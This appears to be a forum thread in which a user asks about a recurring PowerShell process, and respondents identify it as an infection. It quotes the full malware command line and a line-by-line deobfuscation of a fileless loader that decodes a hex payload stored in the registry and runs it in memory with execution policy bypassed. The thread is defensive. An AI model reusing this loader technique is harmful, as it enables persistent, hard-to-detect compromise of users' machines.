Answer the question
In order to leave comments, you need to log in
N
N
Nordman992020-12-28 19:06:48
Nordman99, 2020-12-28 19:06:48
What would such a process mean?
Hello everyone, tell me, I caught a powershell process running on my computer with the following parameters:
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -noexit -Command "function DE0PB([string]$s){[email protected]();for ($i=0; $i -lt $s.Length;$i+=2){$H+=[Byte]::Parse($s.Substring($i,2),[System.Globalization.NumberStyles]::HexNumber);}; return $ H;}; $ _ b = (get-itemproperty -path 'HKCU: \ SOFTWARE \ Microsoft \ dMRLYUkOsPUxocGwuwjSSNZqQMPtNbLhGeyfrlsTCBSrqqahIWUJATEASqgIDqPZzXxZCGzpzpyDoPIChjZuJhLYZdhmoJluOBhsbpci' -name 'dMRLYUkOsPUxocGwuwjSSNZqQMPtNbLhGeyfrlsTCBSrqqahIWUJATEASqgIDqPZzXxZCGzpzpyDoPIChjZuJhLYZdhmoJluOBhsbpci') dMRLYUkOsPUxocGwuwjSSNZqQMPtNbLhGeyfrlsTCBSrqqahIWUJATEASqgIDqPZzXxZCGzpzpyDoPIChjZuJhLYZdhmoJluOBhsbpci; $ _ b = $ _ b.replace ( 'P •', 'E'. );[byte[]]$_0 = DE0PB($_b);$_1 = [System.Threading.Thread]::GetDomain().Load($_0);$_1.EntryPoint.invoke($null,$null);"
If you nail it, then after a reboot it starts again, I can’t track what it starts - I don’t see any startup script for this process anywhere in any autoload, searching the entire registry for the powrshell.exe entry also did not give any results, there are records about powershell.exe but not with such launch parameters, the autoruns.exe utility from Sysinternals also showed nothing, in the task scheduler I also did not see anything launching a powershell with such parameters, tell me what other ways are there to find out what launches this powershell process?
And most importantly - what does this whole process with these parameters mean to someone?
It looks very much like unhealthy viral activity, like Windows Defender is standing and working
3 answer(s)
@Nordman99
@alhaos
A
azarij, 2020-12-28 @Nordman99
yes, some kind of infection was caught:
https://www.joesandbox.com/analysis/188751/1/html
I would not look for where it came from, but would format the system and start from scratch. great reason.
You can search, of course, and clean it, but where is the guarantee that you will clean it 100%?
A
alhaos, 2020-12-29 @alhaos
function DE0PB([string]$s) {
$H = @()
for ($i = 0; $i -lt $s.Length; $i += 2) {
$H += [Byte]::Parse($s.Substring($i, 2), [System.Globalization.NumberStyles]::HexNumber);
};
return $H;
};
# функция распарсивает строку записаную hex симвалами по два в байты
$_b = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\dMRLYUkOsPUxocGwuwjSSNZqQMPtNbLhGeyfrlsTCBSrqqahIWUJATEASqgIDqPZzXxZCGzpzpyDoPIChjZuJhLYZdhmoJluOBhsbpci' -name 'dMRLYUkOsPUxocGwuwjSSNZqQMPtNbLhGeyfrlsTCBSrqqahIWUJATEASqgIDqPZzXxZCGzpzpyDoPIChjZuJhLYZdhmoJluOBhsbpci').dMRLYUkOsPUxocGwuwjSSNZqQMPtNbLhGeyfrlsTCBSrqqahIWUJATEASqgIDqPZzXxZCGzpzpyDoPIChjZuJhLYZdhmoJluOBhsbpci;
# зачение ключа реестра в $_b
$_b = $_b.replace('Р•', 'E');
# замена в нем Р• на E
[byte[]]$_0 = DE0PB($_b);
# строковое значение распарсивается на байты
$_1 = [System.Threading.Thread]::GetDomain().Load($_0); $_1.EntryPoint.invoke($null, $null);
# тут она запускается )))
Similar questions
T
M
maxtar2016-02-02 17:02:03
How to get a list of open Windows Firewall ports on a local machine?
2Reply
T
I
G
Didn't find what you were looking for?
Ask your questionAsk a Question
731 491 924 answers to any question